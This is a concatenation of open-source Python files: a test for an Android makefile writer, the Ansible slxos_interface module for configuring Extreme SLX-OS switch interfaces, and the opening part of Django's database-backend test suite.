TOOL_DIR = 'tool'
def generate_dummy_vars_dict(name):
"""Create a VarsDict and fill it with dummy entries.
Args:
name: string to be appended to each entry, if not None.
Returns:
A VarsDict with dummy entries.
"""
vars_dict = vars_dict_lib.VarsDict()
for key in vars_dict.keys():
entry = key.lower()
if name:
entry += '_' + name
vars_dict[key].add(entry)
return vars_dict
def generate_write_local_vars_params():
"""Generator to compute params for write_local_vars tests.
Each iteration yields a new tuple: (filename, append, name), specific to a
way to call write_local_vars for the tests.
Yields:
filename: filename corresponding to the expectation file for this
combination of params to write_local_vars.
append: boolean to pass as append parameter to write_local_vars.
name: string to pass as name parameter to write_local_vars.
"""
for append in [ True, False ]:
for name in [ None, 'arm', 'foo' ]:
filename = 'write_local_vars'
if append:
filename += '_append'
else:
filename += '_no_append'
if name:
filename += '_' + name
else:
filename += '_no_name'
yield (filename, append, name)
def generate_dummy_vars_dict_data(name, condition):
"""Create a dummy VarsDictData.
Create a dummy VarsDictData, using the name for both the contained
VarsDict and the VarsDictData
Args:
name: name used by both the returned VarsDictData and its contained
VarsDict.
condition: condition used by the returned VarsDictData.
Returns:
A VarsDictData with dummy values, using the passed in info.
"""
vars_dict = generate_dummy_vars_dict(name)
return makefile_writer.VarsDictData(vars_dict=vars_dict, name=name,
condition=condition)
def generate_dummy_makefile(target_dir):
"""Create a dummy makefile to demonstrate how it works.
Use dummy values unrelated to any gyp files. Its output should remain the
same unless/until makefile_writer.write_android_mk changes.
Args:
target_dir: directory in which to write the resulting Android.mk
"""
common_vars_dict = generate_dummy_vars_dict(None)
deviation_params = [('foo', 'COND'), ('bar', None)]
deviations = [generate_dummy_vars_dict_data(name, condition)
for (name, condition) in deviation_params]
makefile_writer.write_android_mk(target_dir=target_dir,
common=common_vars_dict,
deviations_from_common=deviations)
def generate_dummy_tool_makefile(target_dir):
"""Create a dummy makefile for a tool.
Args:
target_dir: directory in which to write the resulting Android.mk
"""
vars_dict = generate_dummy_vars_dict(None)
tool_makefile_writer.write_tool_android_mk(target_dir=target_dir,
var_dict=vars_dict)
class MakefileWriterTest(unittest.TestCase):
def test_write_group_empty(self):
f = tempfile.TemporaryFile()
assert f.tell() == 0
for empty in (None, []):
for truth in (True, False):
makefile_writer.write_group(f, 'name', empty, truth)
self.assertEqual(f.tell(), 0)
f.close()
def test_write_group(self):
animals = ('dog', 'cat', 'mouse', 'elephant')
fd, filename = tempfile.mkstemp()
with open(filename, 'w') as f:
makefile_writer.write_group(f, 'animals', animals, False)
os.close(fd)
# Now confirm that it matches expectations
utils.compare_to_expectation(filename, 'animals.txt', self.assertTrue)
with open(filename, 'w') as f:
makefile_writer.write_group(f, 'animals_append', animals, True)
# Now confirm that it matches expectations
utils.compare_to_expectation(filename, 'animals_append.txt',
self.assertTrue)
os.remove(filename)
def test_write_local_vars(self):
vars_dict = generate_dummy_vars_dict(None)
# Compare various ways of calling write_local_vars to expectations.
for (filename, append, name) in generate_write_local_vars_params():
fd, outfile = tempfile.mkstemp()
with open(outfile, 'w') as f:
makefile_writer.write_local_vars(f, vars_dict, append, name)
os.close(fd)
# Compare to the expected file.
utils.compare_to_expectation(outfile, filename, self.assertTrue,
REBASELINE_MSG)
# KNOWN_TARGETS is always a key in the input VarsDict, but it should not
# be written to the resulting file.
# Note that this assumes none of our dummy entries is 'KNOWN_TARGETS'.
known_targets_name = 'KNOWN_TARGETS'
self.assertEqual(len(vars_dict[known_targets_name]), 1)
with open(outfile, 'r') as f:
self.assertNotIn(known_targets_name, f.read())
os.remove(outfile)
def test_write_android_mk(self):
outdir = tempfile.mkdtemp()
generate_dummy_makefile(outdir)
utils.compare_to_expectation(os.path.join(outdir, MAKEFILE_NAME),
MAKEFILE_NAME, self.assertTrue, REBASELINE_MSG)
shutil.rmtree(outdir)
def test_tool_writer(self):
outdir = tempfile.mkdtemp()
tool_dir = os.path.join(outdir, TOOL_DIR)
os.mkdir(tool_dir)
generate_dummy_tool_makefile(tool_dir)
utils.compare_to_expectation(os.path.join(tool_dir, MAKEFILE_NAME),
os.path.join(TOOL_DIR, MAKEFILE_NAME),
self.assertTrue, REBASELINE_MSG)
def main():
loader = unittest.TestLoader()
suite = loader.loadTestsFromTestCase(MakefileWriterTest)
results = unittest.TextTestRunner(verbosity=2).run(suite)
print repr(results)
if not results.wasSuccessful():
raise Exception('failed one or more unittests')
def rebaseline():
generate_dummy_makefile(utils.EXPECTATIONS_DIR)
vars_dict = generate_dummy_vars_dict(None)
for (filename, append, name) in generate_write_local_vars_params():
with open(os.path.join(utils.EXPECTATIONS_DIR, filename), 'w') as f:
makefile_writer.write_local_vars(f, vars_dict, append, name)
generate_dummy_tool_makefile(os.path.join(utils.EXPECTATIONS_DIR, TOOL_DIR))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--rebaseline', help='Rebaseline expectations.',
action='store_true')
args = parser.parse_args()
if args.rebaseline:
rebaseline()
else:
main()
|
pgmillon/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/slxos/slxos_interface.py
|
91
|
#!/usr/bin/python
#
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: slxos_interface
version_added: "2.6"
author: "Lindsay Hill (@LindsayHill)"
short_description: Manage Interfaces on Extreme SLX-OS network devices
description:
- This module provides declarative management of Interfaces
on Extreme SLX-OS network devices.
notes:
- Tested against SLX-OS 17s.1.02
options:
name:
description:
- Name of the Interface.
required: true
description:
description:
- Description of Interface.
enabled:
description:
- Interface link status.
default: True
type: bool
speed:
description:
- Interface link speed.
mtu:
description:
- Maximum size of transmit packet.
tx_rate:
description:
- Transmit rate in bits per second (bps).
rx_rate:
description:
- Receiver rate in bits per second (bps).
neighbors:
description:
- Check the operational state of given interface C(name) for LLDP neighbor.
- The following suboptions are available.
suboptions:
host:
description:
- "LLDP neighbor host for given interface C(name)."
port:
description:
- "LLDP neighbor port to which given interface C(name) is connected."
aggregate:
description: List of Interfaces definitions.
delay:
description:
- Time in seconds to wait before checking for the operational state on remote
device. This wait is applicable for operational state argument which are
I(state) with values C(up)/C(down), I(tx_rate) and I(rx_rate).
default: 10
state:
description:
- State of the Interface configuration, C(up) means present and
operationally up and C(down) means present and operationally C(down)
default: present
choices: ['present', 'absent', 'up', 'down']
"""
EXAMPLES = """
- name: configure interface
slxos_interface:
name: Ethernet 0/2
description: test-interface
speed: 1000
mtu: 9216
- name: remove interface
slxos_interface:
name: Loopback 9
state: absent
- name: make interface up
slxos_interface:
name: Ethernet 0/2
enabled: True
- name: make interface down
slxos_interface:
name: Ethernet 0/2
enabled: False
- name: Check intent arguments
slxos_interface:
name: Ethernet 0/2
state: up
tx_rate: ge(0)
rx_rate: le(0)
- name: Check neighbors intent arguments
slxos_interface:
name: Ethernet 0/41
neighbors:
- port: Ethernet 0/41
host: SLX
- name: Config + intent
slxos_interface:
name: Ethernet 0/2
enabled: False
state: down
- name: Add interface using aggregate
slxos_interface:
aggregate:
- { name: Ethernet 0/1, mtu: 1548, description: test-interface-1 }
- { name: Ethernet 0/2, mtu: 1548, description: test-interface-2 }
speed: 10000
state: present
- name: Delete interface using aggregate
slxos_interface:
aggregate:
- name: Loopback 9
- name: Loopback 10
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device.
returned: always, except for the platforms that use Netconf transport to manage the device.
type: list
sample:
- interface Ethernet 0/2
- description test-interface
- mtu 1548
"""
import re
from copy import deepcopy
from time import sleep
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import exec_command
from ansible.module_utils.network.slxos.slxos import get_config, load_config
from ansible.module_utils.network.common.config import NetworkConfig
from ansible.module_utils.network.common.utils import conditional, remove_default_spec
def validate_mtu(value, module):
if value and not 1548 <= int(value) <= 9216:
module.fail_json(msg='mtu must be between 1548 and 9216')
def validate_param_values(module, obj, param=None):
if param is None:
param = module.params
for key in obj:
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if callable(validator):
validator(param.get(key), module)
def parse_shutdown(configobj, name):
cfg = configobj['interface %s' % name]
cfg = '\n'.join(cfg.children)
match = re.search(r'^shutdown', cfg, re.M)
if match:
return True
else:
return False
def parse_config_argument(configobj, name, arg=None):
cfg = configobj['interface %s' % name]
cfg = '\n'.join(cfg.children)
match = re.search(r'%s (.+)$' % arg, cfg, re.M)
if match:
return match.group(1)
def search_obj_in_list(name, lst):
for o in lst:
if o['name'] == name:
return o
return None
def add_command_to_interface(interface, cmd, commands):
if interface not in commands:
commands.append(interface)
commands.append(cmd)
def map_config_to_obj(module):
config = get_config(module)
configobj = NetworkConfig(indent=1, contents=config)
match = re.findall(r'^interface (\S+ \S+)', config, re.M)
if not match:
return list()
instances = list()
for item in set(match):
obj = {
'name': item,
'description': parse_config_argument(configobj, item, 'description'),
'speed': parse_config_argument(configobj, item, 'speed'),
'mtu': parse_config_argument(configobj, item, 'mtu'),
'disable': True if parse_shutdown(configobj, item) else False,
'state': 'present'
}
instances.append(obj)
return instances
def map_params_to_obj(module):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
validate_param_values(module, item, item)
d = item.copy()
if d['enabled']:
d['disable'] = False
else:
d['disable'] = True
obj.append(d)
else:
params = {
'name': module.params['name'],
'description': module.params['description'],
'speed': module.params['speed'],
'mtu': module.params['mtu'],
'state': module.params['state'],
'delay': module.params['delay'],
'tx_rate': module.params['tx_rate'],
'rx_rate': module.params['rx_rate'],
'neighbors': module.params['neighbors']
}
validate_param_values(module, params)
if module.params['enabled']:
params.update({'disable': False})
else:
params.update({'disable': True})
obj.append(params)
return obj
def map_obj_to_commands(updates):
commands = list()
want, have = updates
args = ('speed', 'description', 'mtu')
for w in want:
name = w['name']
disable = w['disable']
state = w['state']
obj_in_have = search_obj_in_list(name, have)
interface = 'interface ' + name
if state == 'absent' and obj_in_have:
commands.append('no ' + interface)
elif state in ('present', 'up', 'down'):
if obj_in_have:
for item in args:
candidate = w.get(item)
running = obj_in_have.get(item)
if candidate != running:
if candidate:
cmd = item + ' ' + str(candidate)
add_command_to_interface(interface, cmd, commands)
if disable and not obj_in_have.get('disable', False):
add_command_to_interface(interface, 'shutdown', commands)
elif not disable and obj_in_have.get('disable', False):
add_command_to_interface(interface, 'no shutdown', commands)
else:
commands.append(interface)
for item in args:
value = w.get(item)
if value:
commands.append(item + ' ' + str(value))
if disable:
commands.append('no shutdown')
return commands
def check_declarative_intent_params(module, want, result):
failed_conditions = []
have_neighbors = None
for w in want:
want_state = w.get('state')
want_tx_rate = w.get('tx_rate')
want_rx_rate = w.get('rx_rate')
want_neighbors = w.get('neighbors')
if want_state not in ('up', 'down') and not want_tx_rate and not want_rx_rate and not want_neighbors:
continue
if result['changed']:
sleep(w['delay'])
command = 'show interface %s' % w['name']
rc, out, err = exec_command(module, command)
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
if want_state in ('up', 'down'):
match = re.search(r'%s (\w+)' % 'line protocol is', out, re.M)
have_state = None
if match:
have_state = match.group(1)
if have_state is None or not conditional(want_state, have_state.strip()):
failed_conditions.append('state ' + 'eq(%s)' % want_state)
if want_tx_rate:
match = re.search(r'%s (\d+)' % 'Output', out, re.M)
have_tx_rate = None
if match:
have_tx_rate = match.group(1)
if have_tx_rate is None or not conditional(want_tx_rate, have_tx_rate.strip(), cast=int):
failed_conditions.append('tx_rate ' + want_tx_rate)
if want_rx_rate:
match = re.search(r'%s (\d+)' % 'Input', out, re.M)
have_rx_rate = None
if match:
have_rx_rate = match.group(1)
if have_rx_rate is None or not conditional(want_rx_rate, have_rx_rate.strip(), cast=int):
failed_conditions.append('rx_rate ' + want_rx_rate)
if want_neighbors:
have_host = []
have_port = []
if have_neighbors is None:
rc, have_neighbors, err = exec_command(module, 'show lldp neighbors detail')
if rc != 0:
module.fail_json(msg=to_text(err, errors='surrogate_then_replace'), command=command, rc=rc)
if have_neighbors:
lines = have_neighbors.strip().split('Local Interface: ')
short_name = w['name'].replace('Ethernet', 'Eth')
for line in lines:
field = line.split('\n')
if field[0].split('(')[0].strip() == short_name:
for item in field:
if item.startswith('System Name:'):
have_host.append(item.split(':')[1].strip())
if item.startswith('Remote Interface:'):
have_port.append(item.split(':')[1].split('(')[0].strip())
for item in want_neighbors:
host = item.get('host')
port = item.get('port')
if host and host not in have_host:
failed_conditions.append('host ' + host)
if port and port not in have_port:
failed_conditions.append('port ' + port)
return failed_conditions
def main():
""" main entry point for module execution
"""
neighbors_spec = dict(
host=dict(),
port=dict()
)
element_spec = dict(
name=dict(),
description=dict(),
speed=dict(),
mtu=dict(),
enabled=dict(default=True, type='bool'),
tx_rate=dict(),
rx_rate=dict(),
neighbors=dict(type='list', elements='dict', options=neighbors_spec),
delay=dict(default=10, type='int'),
state=dict(default='present',
choices=['present', 'absent', 'up', 'down'])
)
aggregate_spec = deepcopy(element_spec)
aggregate_spec['name'] = dict(required=True)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
required_one_of = [['name', 'aggregate']]
mutually_exclusive = [['name', 'aggregate']]
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=required_one_of,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands((want, have))
result['commands'] = commands
if commands:
if not module.check_mode:
load_config(module, commands)
result['changed'] = True
failed_conditions = check_declarative_intent_params(module, want, result)
if failed_conditions:
msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions, changed=result['changed'])
module.exit_json(**result)
if __name__ == '__main__':
main()
|
RossBrunton/django
|
refs/heads/master
|
tests/backends/tests.py
|
77
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.test.utils import str_prefix
from django.utils import six
from django.utils.six.moves import range
from . import models
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_nodb_connection(self):
"""
Test that the _nodb_connection property fallbacks to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
del connection._nodb_connection
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
del connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], settings.DATABASES[DEFAULT_DB_ALIAS]['NAME'])
# Check a RuntimeWarning nas been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['OPTIONS']['isolation_level'] = serializable
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import psycopg2_version
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
